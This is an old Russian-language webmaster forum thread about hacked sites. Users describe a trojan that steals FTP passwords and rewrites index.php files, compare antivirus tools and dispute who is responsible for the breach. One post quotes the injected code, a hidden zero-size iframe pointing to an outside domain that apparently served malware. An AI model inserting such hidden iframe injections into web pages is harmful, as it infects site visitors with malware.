Владельцы сайтов и хостеры, прошу обратить внимание!
1895 сообщений
456 сообщений
#17 лет назад
У меня была таже проблема
292 сообщения
#17 лет назад
Тоже самое было. Но у меня менее изящно. Просто вставляли ифрейм в страницу. :angry:
1895 сообщений
#17 лет назад
Кстати, я нашел случайно исчо один сайт который тоже бил подвержен атаке, со временм гугль єво занес в черний список, и перестал его индексировать, такчто єто исчо один повод чтобы серьёзней относиться к своим сайтам.
44 сообщения
#17 лет назад
Господа. Итальянцы здесь абсолютно не причем Все намного проще. Вы залезаете на какой то сайт, с которого Вам на машину скачивается троян. После этого, когда вы открываете свой ftp клиент - троян отсылает всю инфу с клиента (хосты, пароли) и т.п. своему хозяину. После этого происходит следующее: Вдруг откуда не возьмись, ровно в 2 часа ночи, на всех Ваших сайтах заменяются файлы index.php (html и т.п.). Как правило, в тело файла идет втавка фрейма, через который потом любому пользователю, зашедшему на сайт, подгружается тот же троян. Таким образом идет цепная реакция....Данный троян не обнаруживается практически никакими антивирями. Иногда Его вилит avast! Pro, иногда NOD, но реже... Касперский его вообще не видел (хотя сейчас может уже есть обновления с ним). Хорошо отлавливает троян только Spyware Doctor
А вообще - не храните пароли в клиентах и браузерах...
1895 сообщений
#17 лет назад
franklin90, я раскрыл тему как раз Цитата:Вдруг откуда не возьмись,..., моего клиента бомбили итальянцы. И не било никакой вставки фрейма, я про єто ни слова не написал. Єто другой менее єфективний вид атаки. Возможно я скоро и про него напишу если будет заказ)
711 сообщений
#17 лет назад
franklin90, Только неопытные пользователи Обновляют только автоматически Касперского ! например я , создал сам свою базу :P:P
1895 сообщений
#17 лет назад
Вирус прогрессирует, только что получил отчёт из китайского хоста уже, подробности в портфолио. Будьте бдительны!
264 сообщения
#17 лет назад
Благодарю за информацию. Моя "таблетка" - это Касперский Интернет Секьюрити, лицензия. Советую.
156 сообщений
1895 сообщений
#17 лет назад
ASV-Design, именно єто я и рекомендовал, но хост все равно беззащитен! Но для пользователей будет кругом спасения.AlekseySribnyj, я не поєт, и не русский! Пишу как умею.
Только что зафиксировал ишо одну атаку!
5 сообщений
#17 лет назад
Цитата ("MMM_Corp"):ASV-Design, именно єто я и рекомендовал, но хост все равно беззащитен! Но для пользователей будет кругом спасения.
AlekseySribnyj, я не поєт, и не русский! Пишу как умею.
Только что зафиксировал ишо одну атаку!
Какие инструменты для обнаружения атаки вы использовали?
1895 сообщений
#17 лет назад
REPLAY, см. скрин. + фаєрвол Agnitum Outpost + самодельные примочки, єто на Вашем хостинге размещен сайт моего клиента ?
5 сообщений
#17 лет назад
Цитата ("MMM_Corp"):REPLAY, см. скрин. + фаєрвол Agnitum Outpost + самодельные примочки
Agnitum Outpost защищает вашу машинку а не сервер где находится сайт.
1895 сообщений
#17 лет назад
REPLAY, ) спасибо, я в курсе, Ви спросили я ответил, за защиту хоста мне не платят, посему єто уже не моя проблема , источник я нашел, сайт чист, доказательства я предоставил, клиент Вам платит деньги за хост, поєтому Вам уже искать где беда, не мне, я свою работу выполнил.
5 сообщений
#17 лет назад
Ох неужели выполнили ну нуЦитата ("MMM_Corp"):
REPLAY, ) спасибо, я в курсе, Ви спросили я ответил, за защиту хоста мне не платят, посему єто уже не моя проблема , источник я нашел, сайт чист, доказательства я предоставил, клиент Вам платит деньги за хост, поєтому Вам уже искать где беда, не мне, я свою работу выполнил.
не этот ли кусок кода оказался проблемным?
iframe src="httр://adventureboats.co.nz/skunk/images/index.htm" scrolling="no" frameborder="0" width=0 height=0
1895 сообщений
#17 лет назад
REPLAY, 1. а Ви би лучше посмотрели куда он ведет, вообшето никуда, как Ви єто обясните?
2. вечерком я проверю наличие с субботней копией сайта, уточним бил там єтот код или нет, ви вечером будете ?
3. как Ви обьясните что даже через ФТП нельзя скопировать все то что у клиента хосте? (причем периодично)
4. как Ви обьясните каким образом могла бить иньекция прямо на хосте?
5. как Ви обьясните несоответствие айпи?
P.S. На мой русский не обращайте внимания
5 сообщений
#17 лет назад
Цитата ("MMM_Corp"):REPLAY,
1. а Ви би лучше посмотрели куда он ведет, вообшето никуда, как Ви єто обясните?
2. вечерком я проверю наличие с субботней копией сайта, уточним бил там єтот код или нет, ви вечером будете ?
3. как Ви обьясните что даже через ФТП нельзя скопировать все то что у клиента хосте? (причем периодично)
4. как Ви обьясните каким образом могла бить иньекция прямо на хосте?
5. как Ви обьясните несоответствие айпи?
P.S. На мой русский не обращайте внимания
изменения index.php производилось по фтп тут ip из логов я вываливать не буду :P